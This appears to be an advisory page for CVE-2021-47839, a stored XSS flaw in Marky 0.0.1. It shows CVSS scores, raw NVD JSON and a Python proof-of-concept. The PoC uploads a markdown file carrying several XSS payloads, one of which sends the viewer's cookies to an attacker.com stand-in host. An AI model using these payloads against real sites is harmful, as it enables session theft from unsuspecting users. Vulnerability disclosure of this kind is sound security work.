Security Vulnerability Report
CVE-2021-47839 CVSS 7.2 HIGH

CVE-2021-47839

Published: 2026-01-16 19:16:10
Last Modified: 2026-04-15 00:35:42

Description

Marky 0.0.1 contains a persistent cross-site scripting vulnerability that allows attackers to inject malicious scripts into markdown files. Attackers can upload crafted markdown files with embedded JavaScript payloads that execute when the file is opened, potentially enabling remote code execution.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Marky 0.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2021-47839 PoC - Marky 0.0.1 Persistent XSS This PoC demonstrates how to exploit the persistent XSS vulnerability in Marky by uploading a malicious Markdown file. """ import requests import json TARGET_URL = "http://target-server.com" # Replace with actual target UPLOAD_ENDPOINT = f"{TARGET_URL}/upload" # Malicious Markdown payload with embedded JavaScript # This payload will execute JavaScript when the file is viewed MALICIOUS_PAYLOAD = '''# Document Title <script>alert("XSS Vulnerability Triggered - CVE-2021-47839");</script> ## Content This file contains a persistent XSS payload. <script> // Steal cookies and send to attacker document.write('<img src="http://attacker.com/log?cookie=' + document.cookie + '"/>'); </script> ## Additional Test Payloads: <img src=x onerror="alert(document.domain)"> <a href="javascript:alert(document.cookie)">Click me</a> <svg/onload=alert(document.cookie)> ''' def exploit_cve_2021_47839(): """ Upload malicious Markdown file to exploit persistent XSS """ files = { 'file': ('malicious.md', MALICIOUS_PAYLOAD, 'text/markdown') } try: # Upload the malicious file response = requests.post(UPLOAD_ENDPOINT, files=files) if response.status_code == 200: print("[+] Malicious file uploaded successfully!") print(f"[+] Payload will execute when file is viewed by any user") print(f"[+] Response: {response.text}") else: print(f"[-] Upload failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": print("CVE-2021-47839 Marky Persistent XSS Exploit") print("=" * 50) exploit_cve_2021_47839()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47839", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:09.537", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Marky 0.0.1 contains a persistent cross-site scripting vulnerability that allows attackers to inject malicious scripts into markdown files. Attackers can upload crafted markdown files with embedded JavaScript payloads that execute when the file is opened, potentially enabling remote code execution."}, {"lang": "es", "value": "Marky 0.0.1 contiene una vulnerabilidad persistente de cross-site scripting que permite a los atacantes inyectar scripts maliciosos en archivos markdown. Los atacantes pueden subir archivos markdown manipulados con cargas útiles de JavaScript incrustadas que se ejecutan cuando se abre el archivo, lo que podría permitir la ejecución remota de código."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", 
"modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/vesparny/marky", "source": "[email protected]"}, {"url": "https://imgur.com/a/qclfrUx", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49831", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/marky-persistent-cross-site-scripting", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/marky-persistent-cross-site-scripting", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}